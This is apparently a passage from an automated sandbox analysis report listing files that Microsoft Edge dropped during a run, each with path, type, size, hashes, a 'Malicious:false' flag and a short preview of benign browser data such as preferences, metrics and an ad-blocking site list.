                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\d4685f6b-11de-451e-b198-ce01dd31bbe1.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                                                        MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                                                        SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                                                        SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                                                        SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6762D450-1DEC.pma

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.341472245923562
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:PnawLs4RSC9Wf6QkV1ilxTug1HFAa3dzc7gcsyw+zb+9rvCfZ87Z:fawWx3kV1ixTuaH338l6+nSvUZ87Z
                                                                                                                                                                                                                                                                                                        MD5:1B1DE7E31F5E1296DF670D17ED005A4B
                                                                                                                                                                                                                                                                                                        SHA1:EE3DCA564805A9E602E498D97598E468CACE874C
                                                                                                                                                                                                                                                                                                        SHA-256:E583E1381685F2747E9ACC374D0AF9CF9E90A2E2BEFF998A5553230452B7B09F
                                                                                                                                                                                                                                                                                                        SHA-512:D920E7B1777B45EAA07FD8810D7B5C176F407274BDA0178C28A94648214DF9189A9A4626D281288EFBCCD236593A8DA2FAE5816080154E64F90E315783B5E06C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@...............`...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....r.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452....x86_64..?........".atfnbn20,1(.0..8..B............5.0.02.Google Inc. (Google):bANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver-5.0.0)M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....s..^o..J...W..^o..J.....1.^o..J.......^o..J../T...^o..J...t...^o..J.......^o..J...Y...^o..J.......^o..J..w....^o..J..A....^o..J..1H...^o..J....c..^o..J...c=..^o..J....J..^o..J..3.(..^o..J.......^o..J.....-.^o..J.....z.^o..J..G....^o..J..8...^o..J...#...^o..J....r..^o..J....k..^o..J..K...^o..J....N..^o..J....ij.^o..J..S..O.^o..J.......^o..J..%....^o..J...z:..^o..J.......^o..J...M..^o

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6762D454-1E68.pma

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.2309536011485821
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:A6nGARTlcjQmhVMAdXDTXQ9aeY5fXrGAfusbFHE6M3Qr0bmRCaXx9:NhRT0/l5j1RE6W4
                                                                                                                                                                                                                                                                                                        MD5:6931ECBE2DCD5866B791B1E3EC947825
                                                                                                                                                                                                                                                                                                        SHA1:581B1A6EF3B5C896AF5E9816E77C23DD6ED084BC
                                                                                                                                                                                                                                                                                                        SHA-256:CE0DF5D994D2A18CC93AF88DE72E554743DB582A501FD8F81947D92DADA139F0
                                                                                                                                                                                                                                                                                                        SHA-512:3E0BC9898F8C83518B6AC691E6169712DEBEA201348AAC994F4F13002055FD3FA23F8882EE193E18539335D244C589E0A9727E779B32665BF1A49403CEA4A48E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@................|...z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452....x86_64..?........".atfnbn20,1(.0..8..B....(.....10.0.19041.5462.Google Inc. (Google):bANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver-5.0.0)M..BU..Be...?j...GenuineIntel... .. ..............x86_64...J../T...^o..J...Y...^o..J..w....^o..J..A....^o..J..1H...^o..J....c..^o..J...c=..^o..J....J..^o..J...#...^o..J....k..^o..J..S..O.^o..J..l.zL.^o..J..1.9..^o..J..@."..^o..J..?U...^o..J..aV...^o..J..z{...^o..J..n....^o..J...@...^o..J...I.r.^o..J.......^o..J..ZK...^o..J.....^o..J.......^o..J....\.^o..J.....f.^o..J...7Y..^o..J......^o..J.......^o..J.. .E..^o..J..BE1..^o..J...{...^o.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.147870920005786
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlEkjgh/JVJExcBUDmTKTPr3tlwBVP/Sh/JzvghwRHIsKqJBQIlOllt:o1Ez/fJPUDmTEdlwBVsJDYOIeBQn/
                                                                                                                                                                                                                                                                                                        MD5:F92242C48A2A65306A4DBCA36F2D4FB2
                                                                                                                                                                                                                                                                                                        SHA1:F82F5878DE4FE39B31A7C4F740D73B819287F47A
                                                                                                                                                                                                                                                                                                        SHA-256:7127372C0ED5765D70CAE75DD7FD2B8AFC786FC015FF47F7D51B25DD7E9B717B
                                                                                                                                                                                                                                                                                                        SHA-512:D75307F207DBC5C948EE12C4DEF072ABB300F1D35C7B0134958A96046D3E255D0BEDCC890752D4644F78D32A6DB73DA20D14368406A629A26243678510EA03EE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:sdPC..........................A...a.Tp"Ep/IEjrCOzDaHH8Lyds/cyKfGU6kWe/UyKSCE9A7WNk="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................487f69de-52fa-434b-98f3-2f0d2be104d4............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\027b81d9-81f8-4c3d-b8a7-2ef6cad83b29.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\145d7463-3328-4e2e-a850-d4333b20cab4.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28236
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56045327282789
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220B7V7pLGLhnCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVA5bcOrwndpItuA:220B7jchnCWPfCfxDu1jaVFcLn8tb
                                                                                                                                                                                                                                                                                                        MD5:0BC818D63B0CF9279C63959925EE2B5A
                                                                                                                                                                                                                                                                                                        SHA1:F22B97463266746954A1AA21B3A7413AE209FD4F
                                                                                                                                                                                                                                                                                                        SHA-256:E654267F4F2649A783A9747282192125AC5422245EB1D1DA7E4D828DFAFE7DD5
                                                                                                                                                                                                                                                                                                        SHA-512:93BE83F87220A65A358C51677C5355CF3B695ECC3AE0C176434C55A3758520614218D04B8D0C13FAFA7CB2A65D839C5DCE165C4AC3A835B11553346AE10CE10D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\15d3ee4f-036e-4e71-a91b-5161b8c3cae6.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24723
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56861186921997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220BhCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVA5bcOrwnupItu9R:220BhCWPfCfxDu1jaVFcLnZtc
                                                                                                                                                                                                                                                                                                        MD5:90F193A17F0C6D72CA8803CD03779C8A
                                                                                                                                                                                                                                                                                                        SHA1:98EAC7B99EEBA7CCE56B32AA8724AEE9AF35ED67
                                                                                                                                                                                                                                                                                                        SHA-256:3CD64657BC0012905D1164142F4B46FB98F4EF22D8F59E2278CF53D67CBDA0BB
                                                                                                                                                                                                                                                                                                        SHA-512:98406CD0C774802E1B3D162A0A48E3CA024ABF766F4EC7F68163B6FCF108BE5D20F51FA6495A7E4E885ED9B315F448FDCDF65BAD0EC2BB6A4522ED8B75A04FBB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1bfe9aef-5835-4a38-b323-72c51fe6b1ac.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.110271059977855
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Bkz3o88bV+FCHQAr42aPcKJ:stqvstQcV3je/bGOQC42U
                                                                                                                                                                                                                                                                                                        MD5:B5F93B1DB910276D6879AFE62A933CEF
                                                                                                                                                                                                                                                                                                        SHA1:7BEB35F99B4167E5CAEBE5B01F1D25B395DBE408
                                                                                                                                                                                                                                                                                                        SHA-256:3EC6DF3C4A75B10E052FA934D81ACF8D7844919754B2AEC5AF74A56C492F915C
                                                                                                                                                                                                                                                                                                        SHA-512:DD403535A48C76A92F0A706F4AE16458D204F0C939C3181564117BAB08E2310F77377178552ABC14ADC82BFBB191B4FD663678D91EA28823A0CA0F1385F6DA92
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\27195776-f37d-47b3-bdb8-e3cdb13548eb.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):30079
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.568240900763996
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220B7V7pLGLhnCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVAin5bcOrwnZpIC:220B7jchnCWPfCfxDu1jaVinFcLnYt0
                                                                                                                                                                                                                                                                                                        MD5:66750B2294B1911B7D250EC77C3F11DE
                                                                                                                                                                                                                                                                                                        SHA1:B61B1897A216AC32ED8842AA1B8FC8E3AE7F6315
                                                                                                                                                                                                                                                                                                        SHA-256:2252058CFA017AEEDB4D4A9C4BCECFCBC15F87C02F3C723FF8441FF84BD63658
                                                                                                                                                                                                                                                                                                        SHA-512:AB0616EE552C19BA75B1D49D08FCABD2A1D79B58081F8A68E293D6906F98F5461EC38595105D30969ED06C6048E516806C62F52D5FF57DB6325B06355DFEF505
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4381c221-d335-4c9c-ad62-3adb6dbc0fbd.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\903b247a-0633-4f21-b3de-f745a04ed592.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10074
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111812263541838
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Bkz3o88bV+FCHQArGBaPcKJ:stqvstQcV3je/bGOQCEU
                                                                                                                                                                                                                                                                                                        MD5:56C6F23A2B38F5C0CDE8623CDDDEB2DE
                                                                                                                                                                                                                                                                                                        SHA1:06BC05EF8FE39106817FC34BE254A4067C3D492E
                                                                                                                                                                                                                                                                                                        SHA-256:BD707F70BCB2B7E13BB191F46CCE7314A3A0D4C123AC734C7919F9BC1259C854
                                                                                                                                                                                                                                                                                                        SHA-512:5E3AEEBA4E6BAEAA67D8B6073EEA16866EEC69C6669685883002BBFE5FA3681C6892C865C420EBF98713CCB202B54C176BF4FC319D5570E72906E0B26F98F052
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):33
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):307
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2382684186024875
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQW94SM1sZ23oH+Tcwtp3hBtB2KLlpRQWij0lyq2PsZ23oH+Tcwtp3hBWsIFUv:72WGSrcYebp3dFLT2Wij0lyvkcYebp33
                                                                                                                                                                                                                                                                                                        MD5:5C8A58673DDBEE40AEEE31EF97AA7025
                                                                                                                                                                                                                                                                                                        SHA1:6B6156F1C881E8EC35FA01C9EBE96881EBAC4E92
